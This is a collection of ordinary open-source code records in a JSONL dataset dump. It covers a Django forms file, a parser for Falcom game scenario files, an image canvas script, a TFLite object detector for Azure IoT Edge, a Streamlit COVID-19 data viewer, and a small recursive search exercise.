forms.CharField(\n required=True,\n widget=forms.Textarea\n )\n\n # some extra (optional)\n def __init__(self, *args, **kwargs):\n super(ContactForm, self).__init__(*args, **kwargs)\n self.fields['contact_name'].label = \"Your Name\"\n self.fields['contact_email'].label = \"Your email:\"\n self.fields['content'].label = \"What do you want to say?\"\n\n\nclass AuthorForm(ModelForm):\n class Meta:\n model = Author\n fields = ['title', 'name', 'birth_date']\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Username'}),\n 'birth_date': forms.TextInput(attrs={'placeholder': 'YYYY-MM-DD'}),\n }\n labels = {\n 'name': _('Writer'),\n }\n help_texts = dict(name=_('Enter Author Name')) # dict literal as dict constructor\n error_messages = {'name': {\n 'max_length': _(\"This writer's name is too long\") # Dict constructor as dict literal\n }}\n\n\nclass BookForm(ModelForm):\n class Meta:\n model = Book\n fields = ['name', 'authors']\n\nclass LoginForm(AuthenticationForm):\n username = forms.CharField(label=\"Username\", max_length=30,\n widget=forms.TextInput(attrs={'class': 'form-control', 'name': 'username'}))\n password = forms.CharField(label=\"Password\", max_length=30,\n widget=forms.TextInput(attrs={'class': 'form-control', 'name': 'password'}))\n\nTITLE_CHOICES = (\n ('MR', 'Mr.'),\n ('MRS', 'Mrs.'),\n ('MS', 'Ms.'),\n)\n\n\nclass AuthorForm2(forms.Form):\n name = forms.CharField(max_length=100)\n title = forms.CharField(max_length=3,\n widget=forms.Select(choices=TITLE_CHOICES), )\n birth_date = forms.DateField(required=False)\n\n\nclass BookForm2(forms.Form):\n name = forms.CharField(max_length=100)\n authors = forms.ModelMultipleChoiceField(queryset=Author.objects.all())\n","repo_name":"learndjangodb/dreams","sub_path":"myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16043774849","text":"from Falcom.Common import *\nfrom . import utils\n\nclass ScenaTypeBase:\n DESCRIPTOR: Tuple[str, str] = None\n\n def __init__(self, *, fs: fileio.FileStream = None, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n if fs:\n self.deserialize(fs)\n\n def toPython(self) -> List[str]:\n if not self.DESCRIPTOR:\n raise NotImplementedError\n\n align = max([len(e[0]) for e in self.DESCRIPTOR])\n align = (align + 4) & ~3\n\n lines = [\n f'{self.__class__.__name__}(',\n ]\n\n formatter = {\n 'C' : lambda v: f'{v}',\n 'B' : lambda v: f'0x{v:02X}',\n 'H' : lambda v: f'{v}',\n 'W' : lambda v: f'0x{v:04X}',\n 'i' : lambda v: f'{v}',\n 'I' : lambda v: f'{v}',\n 'L' : lambda v: f'0x{v:08X}',\n 'f' : lambda v: f'{v:g}.0' if f'{v:g}'.count('.') == 0 else f'{v:g}',\n 'S' : lambda v: f\"{repr(v)}\",\n 'r' : lambda v: f\"{repr(v)}\",\n }\n\n for name, type in self.DESCRIPTOR:\n type = type.split(':', maxsplit = 1)[0]\n value = getattr(self, name)\n lines.append(f'{GlobalConfig.DefaultIndent}{name.ljust(align)}= {formatter[type](value)},')\n\n lines.append(')')\n\n return lines\n\n def serialize(self) -> bytes:\n if not self.DESCRIPTOR:\n raise NotImplementedError\n\n writer = {\n 'B' : lambda v: utils.int_to_bytes(v, 1),\n 'C' : lambda v: utils.int_to_bytes(v, 1),\n 'H' : lambda v: utils.int_to_bytes(v, 2),\n 'W' : lambda v: utils.int_to_bytes(v, 2),\n 'i' : lambda v: utils.int_to_bytes(v, 4),\n 'I' : lambda v: utils.int_to_bytes(v, 4),\n 'I' : lambda v: utils.int_to_bytes(v, 4),\n 'L' : lambda v: utils.int_to_bytes(v, 4),\n 'f' : lambda v: utils.float_to_bytes(v),\n 'S' : lambda v: utils.str_to_bytes(v),\n 'r' : lambda v: b'',\n }\n\n body = bytearray()\n\n for name, type in self.DESCRIPTOR:\n if name.startswith('_'):\n continue\n\n body.extend(writer[type](getattr(self, name)))\n\n return body\n\n def deserialize(self, fs: fileio.FileStream):\n if not self.DESCRIPTOR:\n return\n\n reader = {\n 'B' : lambda: fs.ReadByte(),\n 'C' : lambda: fs.ReadByte(),\n 'H' : lambda: fs.ReadUShort(),\n 'W' : lambda: fs.ReadUShort(),\n 'i' : lambda: fs.ReadLong(),\n 'I' : lambda: fs.ReadULong(),\n 'L' : lambda: fs.ReadULong(),\n 'f' : lambda: fs.ReadFloat(),\n 'S' : lambda: fs.ReadMultiByte(),\n 'r' : lambda: None,\n }\n\n for name, type in self.DESCRIPTOR:\n setattr(self, name, reader[type]())\n\n def __str__(self):\n return '\\n'.join(self.toPython())\n\n __repr__ = __str__\n\nclass DATFileIndex:\n INVALID_INDEX = 0xFFFFFFFF\n\n def __init__(self, value: int = INVALID_INDEX, *, fs: fileio.FileStream = None) -> None:\n if isinstance(value, str):\n value = GlobalConfig.DirTable[value]\n\n self.value = value # type: int\n self.read(fs)\n\n @property\n def dat(self) -> int:\n return self.value >> 16\n\n @property\n def index(self) -> int:\n return self.value & 0xFFFF\n\n def read(self, fs: fileio.FileStream):\n if not fs:\n return\n\n self.value = fs.ReadULong()\n\n def serialize(self) -> bytes:\n buf = bytearray()\n buf.extend(utils.int_to_bytes(self.value, 4))\n return bytes(buf)\n\n @property\n def datName(self) -> str:\n return f'ED6_DT{self.dat:02d}'\n\n @property\n def fileName(self) -> str | None:\n if GlobalConfig.DirTable:\n name = GlobalConfig.DirTable.get(f'{self.value:08X}')\n if name is None:\n return None\n\n return f\"'{name}'\"\n\n return None\n\n @property\n def nameOrValue(self) -> str:\n name = self.fileName\n if name is not None:\n return name\n\n return \"0x%08X\" % self.value\n\n def __str__(self) -> str:\n return f'({self.datName}, 0x{self.index:X})' if self.value != self.INVALID_INDEX else ''\n\n __repr__ = __str__\n\nclass ScenaDataIndex:\n def __init__(self, offset: int = 0, size: int = 0, *, fs: fileio.FileStream = None):\n self.offset = offset # type: int\n self.size = size # type: int\n\n self.read(fs)\n\n def read(self, fs: fileio.FileStream):\n if not fs:\n return\n\n self.offset = fs.ReadUShort()\n self.size = fs.ReadUShort()\n\n def serialize(self) -> bytes:\n buf = bytearray()\n buf.extend(utils.int_to_bytes((self.size << 16) | self.offset, 4))\n return bytes(buf)\n\n def __str__(self) -> str:\n return f'(0x{self.offset:X}, 0x{self.size:X})'\n\n __repr__ = __str__\n\nclass ScenaEntryPoint(ScenaTypeBase):\n SIZE = 0x44\n DESCRIPTOR = (\n ('dword_00', 'L'),\n ('dword_04', 'L'),\n ('dword_08', 'L'),\n ('word_0C', 'W'),\n ('word_0E', 'W'),\n ('dword_10', 'i'),\n ('dword_14', 'i'),\n ('dword_18', 'i'),\n ('dword_1C', 'i'),\n ('dword_20', 'i'),\n ('dword_24', 'i'),\n ('dword_28', 'i'),\n ('dword_2C', 'i'),\n ('word_30', 'H'),\n ('word_32', 'H'),\n ('word_34', 'H'),\n ('word_36', 'H'),\n ('word_38', 'H'),\n ('word_3A', 'H'),\n ('preInitScena', 'W'),\n ('preInitFunction', 'W'),\n ('initScena', 'W'),\n ('initFunction', 'W'),\n )\n\nclass ScenaHeader:\n IMPORT_SCENA_COUNT = 8\n DATA_TABLE_COUNT = 6\n\n def __init__(self, *, fs: fileio.FileStream = None):\n self.mapName = '' # type: str\n self.mapModel = '' # type: str\n self.bgm = 0 # type: int\n self.flags = 0 # type: int\n self.entryFunction = 0 # type: int\n self.importTable = [DATFileIndex()] * self.IMPORT_SCENA_COUNT # type: List[DATFileIndex]\n self.reserved = 0 # type: int\n self.dataTable = [ScenaDataIndex()] * self.DATA_TABLE_COUNT # type: List[ScenaDataIndex]\n self.stringTableOffset = 0 # type: int\n self.headerSize = 0 # type: int\n self.functionTable = ScenaDataIndex() # type: ScenaDataIndex\n self.entryPoint = [] # type: List[ScenaEntryPoint]\n self.entryPointOffset = 0 # type: int\n\n self.read(fs)\n\n def read(self, fs: fileio.FileStream):\n if not fs:\n return\n\n self.mapName = utils.read_fixed_string(fs, 0x0A) # 0x00\n self.mapModel = utils.read_fixed_string(fs, 0x0E) # 0x0A\n self.mapIndex = fs.ReadUShort() # 0x18\n self.bgm = fs.ReadUShort() # 0x1A\n self.flags = fs.ReadUShort() # 0x1C\n self.entryFunction = fs.ReadUShort() # 0x1E\n self.importTable = [DATFileIndex(fs = fs) for _ in range(self.IMPORT_SCENA_COUNT)] # 0x20\n self.reserved = fs.ReadUShort() # 0x40\n self.dataTable = [ScenaDataIndex(fs = fs) for _ in range(self.DATA_TABLE_COUNT)] # 0x42\n self.stringTableOffset = fs.ReadUShort() # 0x5A\n self.headerSize = fs.ReadULong() # 0x5C\n self.functionTable = ScenaDataIndex(fs = fs) # 0x60\n self.entryPointOffset = fs.Position\n\n entryPointCount = (self.dataTable[0].offset - self.entryPointOffset) // ScenaEntryPoint.SIZE\n for _ in range(entryPointCount):\n self.entryPoint.append(ScenaEntryPoint(fs = fs))\n\n def serialize(self) -> bytes:\n assert len(self.importTable) == self.IMPORT_SCENA_COUNT\n assert len(self.dataTable) == self.DATA_TABLE_COUNT\n\n buf = bytearray()\n\n buf.extend(utils.pad_string(self.mapName, 0x0A))\n buf.extend(utils.pad_string(self.mapModel, 0x0E))\n buf.extend(utils.int_to_bytes(self.mapIndex, 2))\n buf.extend(utils.int_to_bytes(self.bgm, 2))\n buf.extend(utils.int_to_bytes(self.flags, 2))\n buf.extend(utils.int_to_bytes(self.entryFunction, 2))\n\n for idx in self.importTable:\n buf.extend(idx.serialize())\n\n buf.extend(utils.int_to_bytes(self.reserved, 2))\n\n for idx in self.dataTable:\n buf.extend(idx.serialize())\n\n buf.extend(utils.int_to_bytes(self.stringTableOffset, 2))\n buf.extend(utils.int_to_bytes(self.headerSize, 4))\n buf.extend(self.functionTable.serialize())\n\n for e in self.entryPoint:\n buf.extend(e.serialize())\n\n return bytes(buf)\n\nclass ScenaChipData(DATFileIndex):\n pass\n\nclass ScenaNpcData(ScenaTypeBase):\n DESCRIPTOR = (\n ('name', 'r'),\n ('x', 'i'),\n ('z', 'i'),\n ('y', 'i'),\n ('direction', 'H'),\n ('word_0E', 'H'),\n ('dword_10', 'I'),\n ('chipIndex', 'H'),\n ('npcIndex', 'W'),\n ('initFunctionIndex', 'W'),\n ('initScenaIndex', 'W'),\n ('talkFunctionIndex', 'W'),\n ('talkScenaIndex', 'W'),\n )\n\nclass ScenaMonsterData(ScenaTypeBase):\n DESCRIPTOR = (\n ('name', 'r'),\n ('x', 'i'),\n ('z', 'i'),\n ('y', 'i'),\n ('word_0C', 'W'),\n ('word_0E', 'W'),\n ('byte_10', 'B'),\n ('byte_11', 'B'),\n ('dword_12', 'L'),\n ('battleIndex', 'W'),\n ('word_18', 'W'),\n ('word_1A', 'W'),\n )\n\nclass ScenaEventData(ScenaTypeBase):\n DESCRIPTOR = (\n ('x', 'i'),\n ('y', 'i'),\n ('z', 'i'),\n ('range', 'i'),\n ('dword_10', 'L'),\n ('dword_14', 'L'),\n ('dword_18', 'L'),\n ('dword_1C', 'L'),\n )\n\nclass ScenaActorData(ScenaTypeBase):\n DESCRIPTOR = (\n ('triggerX', 'i'),\n ('triggerZ', 'i'),\n ('triggerY', 'i'),\n ('triggerRange', 'i'),\n ('actorX', 'i'),\n ('actorZ', 'i'),\n ('actorY', 'i'),\n ('flags', 'W'),\n ('talkScenaIndex', 'W'),\n ('talkFunctionIndex', 'W'),\n ('word_22', 'W'),\n )\n\nclass ScenaFunctionType(IntEnum2):\n Invalid = 0\n Code = 1\n ChipData = 2\n NpcData = 3\n MonsterData = 4\n EventData = 5\n ActorData = 6\n StringTable = 7\n Header = 8\n EntryPoint = 9\n\nclass ScenaDataTableType(IntEnum2):\n ChipDataCH = 0\n ChipDataCP = 1\n NpcData = 2\n MonsterData = 3\n EventData = 4\n ActorData = 5\n\nScenaDataFunctionTypes = set([\n ScenaFunctionType.Header,\n ScenaFunctionType.StringTable,\n ScenaFunctionType.EntryPoint,\n ScenaFunctionType.ChipData,\n ScenaFunctionType.NpcData,\n ScenaFunctionType.MonsterData,\n ScenaFunctionType.EventData,\n ScenaFunctionType.ActorData,\n])\n\nclass ScenaFunction:\n def __init__(self, index: int, offset: int, name: str, *, type = ScenaFunctionType.Invalid, obj = None):\n self.index = index\n self.offset = offset\n self.name = name\n self.type = type\n self.obj = obj\n\n def __str__(self) -> str:\n return f'{self.name}(index = 0x{self.index:04X}, offset = 0x{self.offset:08X}, type = {self.type})'\n\n __repr__ = __str__\n","repo_name":"Ouroboros/Falcom","sub_path":"Decompiler2/Falcom/ED6/Parser/scena_types.py","file_name":"scena_types.py","file_ext":"py","file_size_in_byte":13129,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"61"} +{"seq_id":"22907161898","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#Setting Initialization\n# penyimpanan file\nfilePath = \"/Users/aditya/git/aditya1-github/VisKomp/images/NPID/\" # direktori file\nfileExt = \".jpg\" # ekstension file\nfileName = filePath + \"Background_604x914\" + fileExt # nama file beserta ekstensinya\n\n# ukuran canvas\nrow = int(604) # jumlah baris pixel\ncol = int(914) # jumlah kolom pixel\nchannel = int(3) #\njump_row = 4 # jumlah baris akan diwarnai saat satu kali proses pewarnaan\nbackground = np.zeros(shape=(row, col, channel), dtype=np.uint8) # membuat latar canva pixel\nprint('initialization : \\n row, col =', row, ',', col) # cetak u/ log\n\n# mewarnai\n# background[int(row/2):int(row), :, :] = 0 # background black R=0 G=0 B=0\n# background[int(row/2):int(row), :, 1] = 255 # background green R=0 G=255 B=0\n\n#proses mewarnai terhadap setiap pixel\nfor i in range(1, row - jump_row): # loop sebanyak jml row - jump_row\n for j in range(1, col): # loop sebanyak jml column\n #background[i + jump_row, j, 0] = background[i, j, 0] + 1 # mewarnai dengan RGB setiap pixel\n background[i + jump_row, j, 1] = background[i, j, 1] + 1 # mewarnai dengan RGB setiap pixel\n print('row, col =', i, ',', j) # cetak u/ log\n\n# mensimpan hasil warna pada pixel menjadi image\nplt.imsave(fileName, background)\n\n#proses memanggil\nplt.figure(1) # membuat jendela untuk canva\nplt.imshow(background) # menampilkan background ke jendela canva\nplt.show() # menampilkan jendela canva","repo_name":"aditya1-github/IFA515-UTS-Computer-Vision","sub_path":"002. Project/VisKomp/PraktikumEdgeDetection002.py","file_name":"PraktikumEdgeDetection002.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35619639218","text":"import os\nimport sys\nimport time\n\nimport cv2\nfrom tflite_support.task import core\nfrom tflite_support.task import processor\nfrom tflite_support.task import vision\n\nfrom azure.iot.device import IoTHubModuleClient, Message\n\nimport CameraCapture\nfrom CameraCapture import CameraCapture\nimport VideoStream\nfrom VideoStream import VideoStream\n\n\n# global counters\nSEND_CALLBACKS = 0\n\ndef send_to_Hub_callback(strMessage):\n message = Message(bytearray(strMessage, 'utf8'))\n hubManager.send_message_to_output(message, \"output1\")\n\n# Callback received when the message that we're forwarding is processed.\n\nclass HubManager(object):\n\n def __init__(\n self,\n messageTimeout,\n verbose):\n '''\n Communicate with the Edge Hub\n\n :param int messageTimeout: the maximum time in milliseconds until a message times out. The timeout period starts at IoTHubClient.send_event_async. By default, messages do not expire.\n :param IoTHubTransportProvider protocol: Choose HTTP, AMQP or MQTT as transport protocol. Currently only MQTT is supported.\n :param bool verbose: set to true to get detailed logs on messages\n '''\n self.messageTimeout = messageTimeout\n self.client = IoTHubModuleClient.create_from_edge_environment()\n #self.client.set_option(\"messageTimeout\", self.messageTimeout)\n #self.client.set_option(\"product_info\", \"edge-camera-capture\")\n #if verbose:\n # self.client.set_option(\"logtrace\", 1) # enables MQTT logging\n\n def send_message_to_output(self, event, outputQueueName):\n self.client.send_message_to_output(event, outputQueueName)\n global SEND_CALLBACKS\n SEND_CALLBACKS += 1\n\ndef __IsInt(string):\n try: \n int(string)\n return True\n except ValueError:\n return False\n\n\ndef IsInResult(tag, result):\n if len(result) == 0:\n return False\n for i in result:\n if (tag == i[0]):\n return True\n return False\n\ndef telemeter(i, on):\n telemeter_text = '{ \"tagName\": \"' + i[0] + '\", \"probability\": '\n if on:\n telemeter_text = telemeter_text + str(i[1]) + ', \"state\": true }'\n else:\n telemeter_text = telemeter_text + str(0.00) + ', \"state\": false }'\n print(telemeter_text)\n\n send_to_Hub_callback(telemeter_text)\n\ndef runDetect(model: str, maxObjects: int, scoreThresholdPct: int, videoPath: str, width: int, height: int, num_threads: int,\n enable_edgetpu: bool, showVideo: bool, bypassIot: bool) -> None:\n \"\"\"Continuously run inference on images acquired from the camera.\n\n Args:\n model: Name of the TFLite object detection model.\n videoPath: The camera id/path to be passed to OpenCV.\n width: The width of the frame captured from the camera.\n height: The height of the frame captured from the camera.\n num_threads: The number of CPU threads to run the model.\n enable_edgetpu: True/False whether the model is a EdgeTPU model.\n \"\"\"\n\n # Variables to calculate FPS\n counter, fps = 0, 0\n start_time = time.time()\n vs = None\n isWebcam = False\n\n if (__IsInt(videoPath)):\n isWebcam = True\n vs = VideoStream(int(videoPath), width, height).start()\n time.sleep(1.0)#needed to load at least one frame into the VideoStream class\n else:\n cap = cv2.VideoCapture(videoPath)\n # Start capturing video input from the camera\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n\n # Visualization parameters\n fps_avg_frame_count = 10\n\n # Initialize the object detection model\n base_options = core.BaseOptions(\n file_name=model, use_coral=enable_edgetpu, num_threads=num_threads)\n detection_options = processor.DetectionOptions(\n max_results=maxObjects, score_threshold=scoreThresholdPct/100.0)\n options = vision.ObjectDetectorOptions(\n base_options=base_options, detection_options=detection_options)\n detector = vision.ObjectDetector.create_from_options(options)\n\n previousResults = []\n\n # Continuously capture images from the camera and run inference\n while True:\n image = None\n if isWebcam:\n image = vs.read()\n else:\n image = cap.read()[1]\n if (image is None):\n if (not isWebcam):\n cap.set(cv2.CAP_PROP_POS_FRAMES, 0)\n counter = 0\n continue\n sys.exit(\n 'ERROR: Unable to read from webcam. Please verify your webcam settings.'\n )\n \n counter += 1\n image = cv2.flip(image, 1)\n\n # Convert the image from BGR to RGB as required by the TFLite model.\n rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # Create a TensorImage object from the RGB image.\n input_tensor = vision.TensorImage.create_from_array(rgb_image)\n\n \n # Run object detection estimation using the model.\n detection_result = detector.detect(input_tensor)\n\n results = []\n\n for detection in detection_result.detections:\n category = detection.classes[0]\n class_name = category.class_name\n probability = round(category.score, 2)\n result_text = class_name + ' (' + str(probability) + ')'\n results.append((class_name,probability))\n results.sort()\n# print(result_text)\n\n for i in results:\n if (not IsInResult(i[0], previousResults)):\n print('turn it on ' + i[0])\n if not bypassIot:\n telemeter(i, True)\n\n\n for i in previousResults:\n if (not IsInResult(i[0], results)):\n print('turn it off ' + i[0])\n if not bypassIot:\n telemeter(i, False)\n\n previousResults = results\n \n cameraCapture.put_display_frame(image, detection_result)\n\n # Calculate the FPS\n if counter % fps_avg_frame_count == 0:\n end_time = time.time()\n fps = fps_avg_frame_count / (end_time - start_time)\n start_time = time.time()\n\n # Show the FPS\n fps_text = 'FPS = {:.1f}'.format(fps)\n# print(fps_text)\n# print(counter)\n\ndef main(\n debugy = False,\n model = \"\",\n maxObjects=3,\n scoreThresholdPct=30,\n videoPath=\"0\",\n frameWidth = 0,\n frameHeight = 0,\n numThreads = 0,\n enableEdgeTPU = False,\n showVideo = False,\n verbose = False,\n bypassIot = False\n):\n #if debugy:\n # print(\"Wait for debugger!!!\")\n # import debugpy\n # debugpy.listen(5678)\n # debugpy.wait_for_client() # blocks execution until client is attached\n try:\n print(\"\\nPython %s\\n\" % sys.version)\n print(\"Camera Capture Azure IoT Edge Module. Press Ctrl-C to exit.\")\n print(\"Initialising the camera capture with the following parameters: \")\n print(\" - Model file: \" + model)\n print(\" - Max results: \" + str(maxObjects))\n print(\" - Score threshold percent: \" + str(scoreThresholdPct/100.1))\n print(\" - Video path: \" + videoPath)\n print(\" - Frame width: \" + str(frameWidth))\n print(\" - Frame height: \" + str(frameHeight))\n print(\" - Num Threads: \" + str(numThreads))\n print(\" - Enable TPU: \" + str(enableEdgeTPU))\n print(\" - Show video: \" + str(showVideo))\n print(\" - Verbose: \" + str(verbose))\n print(\" - Send processing results to hub: \" + str(bypassIot))\n print()\n try:\n if not bypassIot:\n global hubManager\n hubManager = HubManager(\n 100, verbose)\n except Exception as iothub_error:\n print(\"Unexpected error %s from IoTHub\" % iothub_error)\n return\n global cameraCapture\n with CameraCapture(showVideo) as cameraCapture:\n cameraCapture\n\n runDetect(model,maxObjects,scoreThresholdPct,videoPath,frameWidth, frameHeight, numThreads,enableEdgeTPU, showVideo, bypassIot)\n\n except KeyboardInterrupt:\n print(\"Camera capture module stopped\")\n\ndef __convertStringToBool(env):\n if env in ['True', 'TRUE', '1', 'y', 'YES', 'Y', 'Yes']:\n return True\n elif env in ['False', 'FALSE', '0', 'n', 'NO', 'N', 'No']:\n return False\n else:\n raise ValueError('Could not convert string to bool.')\n\n'''\nCapture a camera feed, send it to processing and forward outputs to EdgeHub\n\n:param str MODEL: model file. Example: \"efficientdet_lite0.tflite\".\n:param str VIDEO_PATH: camera device path such as /dev/video0 or a test video file such as /Test/myvideo.avi. /dev/video0 by default (\"0\")\n:param etc..\n'''\n\nif __name__ == '__main__':\n try:\n DEBUGY = __convertStringToBool(os.getenv('DEBUG', 'False'))\n MODEL = os.getenv('MODEL', \"efficientdet_lite0.tflite\")\n MAX_OBJECTS = int(os.getenv('MAX_OBJECTS', 3))\n THRESHOLD_PCT = int(os.getenv('THRESHOLD_PCT', 30))\n VIDEO_PATH = os.getenv('VIDEO_PATH', \"../test/AppleAndBanana.mp4\")\n FRAME_WIDTH = int(os.getenv('FRAME_WIDTH', 640))\n FRAME_HEIGHT = int(os.getenv('FRAME_HEIGHT', 480))\n NUM_THREADS = int(os.getenv('NUM_THREADS', 4))\n ENABLE_TPU = __convertStringToBool(os.getenv('ENABLE_TPU', 'False'))\n SHOW_VIDEO = __convertStringToBool(os.getenv('SHOW_VIDEO', 'True'))\n VERBOSE = __convertStringToBool(os.getenv('VERBOSE', 'False'))\n BYPASS_IOT = __convertStringToBool(os.getenv('BYPASS_IOT', 'True'))\n\n except ValueError as error:\n print(error)\n sys.exit(1)\n\nmain(DEBUGY, MODEL, MAX_OBJECTS, THRESHOLD_PCT, VIDEO_PATH, FRAME_WIDTH, FRAME_HEIGHT, NUM_THREADS, ENABLE_TPU,\n SHOW_VIDEO, VERBOSE, BYPASS_IOT)\n","repo_name":"dvescovi1/VisionRPI","sub_path":"modules/CameraCapture/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6120550457","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport time\nimport pandas as pd\nimport streamlit as st\nimport datetime\n\nsource = \"https://covid.ourworldindata.org/data/ecdc/\"\ndataset_array = [\"new_cases\", \"new_deaths\", \"total_cases\", \"total_deaths\"]\nmode = st.sidebar.radio(\"Select view\", [\"One country curve\", \"Countries comparison\", \"Summary\", \"Readme\"])\n\nst.title('Covid-19-visualizer')\n\n# @st.cache\ndef read_csv(array, fetch):\n\tdataframes_dict = {}\n\tfor dataset in dataset_array:\n\t\tif fetch:\n\t\t\twith st.spinner(\"Fetching \"+dataset+\"...\"):\n\t\t\t\ttry:\n\t\t\t\t\tdataframes_dict[dataset] = pd.read_csv(source + dataset+\".csv\")\n\t\t\t\t\tdataframes_dict[dataset].to_csv(dataset+\".csv\")\n\t\t\t\t\tst.success(\"Success downloading \"+ dataset+\".csv\")\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tst.error(e)\n\t\t\t\t\treturn read_csv(array, False) # try read from disk\n\t\telse:\n\t\t\tif os.path.exists(dataset+\".csv\"):\n\t\t\t\tdataframes_dict[dataset] = pd.read_csv(dataset+\".csv\")\n\t\t\telse:\n\t\t\t\treturn {}, False\n\treturn dataframes_dict, True\n\ndataframes_dict, have_data = read_csv(dataset_array, False)\n\nif not have_data:\n\tst.error(\"There is no data and no connection\")\n\tfetch = st.button(\"Click here to retry.\")\n\tif fetch:\n\t\tdataframes_dict = read_csv(dataset_array, fetch)\nelse:\n\ttop10 = st.sidebar.checkbox(\"Top-10\", True)\n\t# i = st.sidebar.slider(\"filter >=\", 0, 10000, 100, step=100) if not top10 else 0 # slider doesn't work, don't kwnow Y?\n\ti = st.sidebar.number_input('Filter >=', min_value=0, max_value=10000, value=300, step=100) if not top10 else 0\n\n\tdf_filtered_dict = {}\n\ttop10_countries = {}\n\n\tfor dataset_key in dataframes_dict:\n\t\tcountries = []\n\t\tlast_pos = len(dataframes_dict[dataset_key]) -1\n\t\t\n\t\tfor country in dataframes_dict[dataset_key].columns[1:]:\n\t\t\tif country==\"date\" or str(dataframes_dict[dataset_key].loc[last_pos,country]) == \"nan\":\n\t\t\t\tcontinue\n\t\t\tif int(dataframes_dict[dataset_key].loc[last_pos,country]) >= i:\n\t\t\t\tcountries.append((country, int(dataframes_dict[dataset_key].loc[last_pos,country])))\n\t\tcountries = sorted(countries, key=lambda tup: - tup[1])\n\t\tif top10:\n\t\t\tcountries = countries[:11]\n\t\t\n\t\tdf_filtered = pd.DataFrame(columns=[a for a,b in countries])\n\t\tdf_filtered.loc[dataset_key] = [b for a,b in countries]\n\t\tdf_filtered_dict[dataset_key] = df_filtered\n\t\tfor a,b in countries:\n\t\t\ttop10_countries[a] = a\n\n\tst.write(\"Date: \",dataframes_dict[dataset_key].loc[last_pos, \"date\"])\n\n\tif dataframes_dict[dataset_key].loc[last_pos, \"date\"] < str(datetime.date.today()) and mode != \"Readme\":\n\t\tif st.button(\"Data is old. Click here to fetch data.\"):\n\t\t\tdataframes_dict, have_data = read_csv(dataset_array, True)\n\t\t\tlast_pos = len(dataframes_dict[dataset_key]) -1\n\t\t\t\n\n\tf = plt.figure()\n\n\tif mode == \"One country curve\":\n\t\tcountry = st.sidebar.selectbox(\"Country\", list(top10_countries))\n\t\tall_dataset = st.sidebar.checkbox(\"All in One\", True)\n\t\tif all_dataset:\n\t\t\tgrid_size = (7,7)\n\t\t\tpos = [(0, 0),(0, 4),(4, 0),(4, 4)]\n\t\t\tfor i in range(4):\n\t\t\t\tplt.subplot2grid(grid_size, pos[i], rowspan=3, colspan=3)\n\t\t\t\tplt.bar(range(last_pos+1), dataframes_dict[dataset_array[i]][country])\n\t\t\t\tplt.title(dataset_array[i])\n\t\t\tst.plotly_chart(f)\n\t\t\t# st.pyplot()\n\t\t\tp = pd.DataFrame(columns=dataframes_dict.keys())\n\t\t\tfor dataset_key in dataframes_dict:\n\t\t\t\tp.loc[country, dataset_key] = dataframes_dict[dataset_key].loc[last_pos,country]\n\t\t\tst.write(p)\n\t\t\t# death_percent = total_deaths * 100 /total_cases\n\t\telse:\n\t\t\tselected_dataset = st.sidebar.radio(\"Dataset\",options=dataset_array)\n\t\t\tplt.bar(range(last_pos+1), dataframes_dict[selected_dataset][country])\n\t\t\tst.plotly_chart(f)\n\t\t\t# st.pyplot()\n\t\t\tst.write(country,\"|\", selected_dataset, dataframes_dict[selected_dataset].loc[last_pos,country])\n\n\tif mode == \"Countries comparison\":\n\t\tcountries = countries[1:]\n\t\tselected_dataset = st.sidebar.radio(\"Dataset\", options=dataset_array)\n\t\tdf_filtered_dict[selected_dataset].drop(['World'], axis='columns', inplace=True)\n\t\tplt.bar(range(len(df_filtered_dict[selected_dataset].columns)), df_filtered_dict[selected_dataset].loc[selected_dataset])\n\t\tplt.xticks(range(len(df_filtered_dict[selected_dataset].columns)), df_filtered_dict[selected_dataset].columns)\n\t\tlabels = plt.axes().get_xticklabels()\n\t\tplt.setp(labels, rotation = 30.) # this doesnt work with plotly\n\t\tst.plotly_chart(f)\n\t\t# st.pyplot()\n\t\tst.write(df_filtered_dict[selected_dataset])\n\t\tst.write(\"World \", dataframes_dict[selected_dataset].loc[last_pos,\"World\"])\n\n\tif mode == \"Summary\":\n\t\tfor dataset_key in dataframes_dict:\n\t\t\tst.write(df_filtered_dict[dataset_key])\n\n\tif mode == \"Readme\":\n\t\twith open(\"Readme.md\") as readme_file:\n\t\t\treadme_text = readme_file.read()\n\t\t\tst.markdown(readme_text[21:])\n","repo_name":"flakula/covid-19-visualizer","sub_path":"covid-19.py","file_name":"covid-19.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73276809473","text":"def search(nums, k, tmp):\n\tif tmp == (len(nums) - 1):\n\t\treturn -1\n\tif nums[tmp] == k:\n\t\treturn tmp\n\telse:\n\t\ttmp += 1\n\t\treturn search(nums, k, tmp)\n\n\ndef solution(nums):\n\tnums, k = nums.split(\"],\")\n\tnums = list(map(int, nums[1:].split(\",\")))\n\tk = int(k)\n\tres = search(nums, k, 0)\n\tprint(f\"Output: {res}\")\n\n\nnums = input(\"Input: \")\nsolution(nums)\n","repo_name":"lisy0123/Study","sub_path":"01_Mail_programming/d25/d25.py","file_name":"d25.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39226870100","text":"import time\nimport datetime\nimport re\nimport json\nimport dicttools\nimport platform\nimport socket\nimport copy\nimport sys\nimport pprint\nfrom operator import itemgetter\nfrom subprocess import Popen, PIPE # for cURL data sending\nimport smtplib # for the actual sending function\nfrom email.mime.text import MIMEText # email module\n\n__author__ = 'Ralf'\n\n# 